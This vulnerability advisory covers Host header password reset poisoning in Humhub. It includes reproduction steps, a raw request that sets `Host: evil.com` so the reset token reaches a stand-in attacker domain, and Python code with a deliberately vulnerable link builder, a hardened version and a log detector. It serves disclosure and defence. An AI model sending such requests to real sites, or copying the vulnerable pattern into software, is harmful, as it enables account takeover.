Password Reset Poisoning in humhub/humhub
Sep 6th 2022
Humhub builds the password reset link that it emails to the user from the HTTP `Host` header of the password reset request, without validating the header against a configured base URL or host allowlist. An attacker who submits a reset request for the victim's email address with a manipulated `Host` header therefore gets an email delivered to the victim whose reset link points at an attacker-controlled domain. If the victim clicks that link, the reset token is leaked to the attacker, who can then set a new password and take over the account.
Proof of Concept
The Proof of Concept requires that the web server serves the Humhub application regardless of the `Host` header, so that a request for `evil.com` still reaches the application instead of being rejected or routed elsewhere. This is the case, for instance, with the default Apache configuration with a single catch-all vhost.
Steps to reproduce on a local Humhub installation:
1. On the login page, click on `Forgot your password?`
2. Enter the victim's email address and the captcha. Intercept the request in Burp.
3. Change the `Host` header to `evil.com` and forward the request (Screenshot 1).
4. Observe that the password reset link points to the manipulated domain `evil.com` (Screenshot 2).
Manipulated password reset request:
```http
POST /index.php?r=user%2Fpassword-recovery HTTP/1.1
Host: evil.com

_csrf=[...]&AccountRecoverPassword%5Bemail%5D=admin%40test.com&AccountRecoverPassword%5BverifyCode%5D=beoadeq
```
Manipulated Password-Reset Link
Password-reset email sent by Humhub:
```text
Password recovery

Hello asd def

Please use the following link within the next day to reset your password.
If you don't use this link within 24 hours, it will expire.

Reset Password: http://evil.com/index.php?r=user/password-recovery/reset&token=c536e810-da84-4f8b-9c8c-375e4b0235da&guid=6a7ad7ef-a91a-4a2c-a13c-52e9decda42a
```
The victim receives the manipulated password-reset link in an email that otherwise looks legitimate, since it is genuinely sent by the Humhub instance. If the victim clicks the link, the browser requests `/index.php?r=user/password-recovery/reset&token=...&guid=...` from `evil.com`, so the reset token and guid land in the attacker's web server logs. The attacker then opens the same path with the leaked token on the real Humhub host and sets a new password for the victim's account, leading to complete account takeover. The attack needs no interaction beyond a single click, but it does depend on the web server answering requests for arbitrary `Host` values. The fix on the application side is to build absolute links in outgoing mail from a configured base URL (in Yii 2 terms, a fixed `request.hostInfo`) rather than from the request's `Host` header, or to reject reset requests whose `Host` is not on an allowlist.
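The following is an added example, not Humhub's code: it models in Python the vulnerable link construction described above beside a hardened version that pins the base URL and allowlists the `Host` header, shows which host ends up receiving the token from a poisoned link, and flags poisoned recovery requests in web server access log lines. The hostnames, base URL and log lines are constructed for the example (the log format is Apache's `vhost_combined`, whose first field is the `Host` the request was served for).

```python
import re
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

# Path of the reset endpoint as seen in the Humhub e-mail above.
RESET_PATH = "/index.php?r=user/password-recovery/reset"

# Hypothetical deployment values; a real install takes these from configuration.
BASE_URL = "https://humhub.example.com"
ALLOWED_HOSTS = {"humhub.example.com"}


@dataclass
class Request:
    """Minimal stand-in for an incoming HTTP request: only the headers matter here."""
    headers: dict = field(default_factory=dict)


def build_reset_link_vulnerable(req: Request, token: str, guid: str) -> str:
    """Vulnerable pattern: the absolute URL in the e-mail is derived from the
    request's Host header, which the client fully controls."""
    host = req.headers["Host"]
    return f"http://{host}{RESET_PATH}&token={token}&guid={guid}"


class UntrustedHost(ValueError):
    """Raised when a reset request arrives for a Host that is not allow-listed."""


def build_reset_link_hardened(req: Request, token: str, guid: str) -> str:
    """Hardened pattern: reject requests for unexpected hosts, and never use the
    header for the link at all; the configured base URL is used instead."""
    host = req.headers.get("Host", "").split(":", 1)[0].strip().lower()
    if host not in ALLOWED_HOSTS:
        raise UntrustedHost(f"rejecting reset request for Host {host!r}")
    return f"{BASE_URL}{RESET_PATH}&token={token}&guid={guid}"


def token_recipient(link: str) -> tuple[str, str]:
    """Return (host, token): the host that receives the token when the victim
    clicks the link, and the token it receives."""
    parts = urlsplit(link)
    token = parse_qs(parts.query).get("token", [""])[0]
    return parts.hostname or "", token


# Apache vhost_combined: "%v:%p %h %l %u %t \"%r\" %>s ..." (only the fields used here).
LOG_RE = re.compile(
    r'^(?P<vhost>[^:\s]+):\d+ (?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def poisoned_recovery_requests(log_lines, allowed_hosts=ALLOWED_HOSTS):
    """Flag password-recovery POSTs that were served for a Host outside the
    allowlist; returns a list of (client_ip, host) pairs."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        if m["method"] != "POST" or "password-recovery" not in m["path"]:
            continue
        if m["vhost"].lower() not in allowed_hosts:
            hits.append((m["ip"], m["vhost"]))
    return hits


# Constructed sample log lines: one legitimate reset request, one poisoned.
SAMPLE_LOG = [
    'humhub.example.com:443 198.51.100.7 - - [06/Sep/2022:10:01:12 +0000] '
    '"POST /index.php?r=user%2Fpassword-recovery HTTP/1.1" 200 2311',
    'evil.com:80 203.0.113.5 - - [06/Sep/2022:10:02:40 +0000] '
    '"POST /index.php?r=user%2Fpassword-recovery HTTP/1.1" 200 2311',
    'evil.com:80 203.0.113.5 - - [06/Sep/2022:10:02:41 +0000] '
    '"GET /index.php?r=dashboard HTTP/1.1" 200 9000',
]


if __name__ == "__main__":
    poisoned = Request({"Host": "evil.com"})
    link = build_reset_link_vulnerable(poisoned, "c536e810-da84-4f8b-9c8c-375e4b0235da", "6a7ad7ef")
    print("vulnerable link:", link)
    print("token goes to:", token_recipient(link))
    try:
        build_reset_link_hardened(poisoned, "tok", "guid")
    except UntrustedHost as e:
        print("hardened:", e)
    print("poisoned requests in log:", poisoned_recovery_requests(SAMPLE_LOG))
```

The hardened builder does two independent things: it refuses to act on a request whose `Host` is not expected, and it ignores the header when composing the link. Either alone closes this issue; doing both also catches the case where a misconfigured reverse proxy rewrites `Host` before it reaches the application. The log check only works if the access log records the requested host (`%v` in Apache, `$host` in nginx), which the default `combined` format does not.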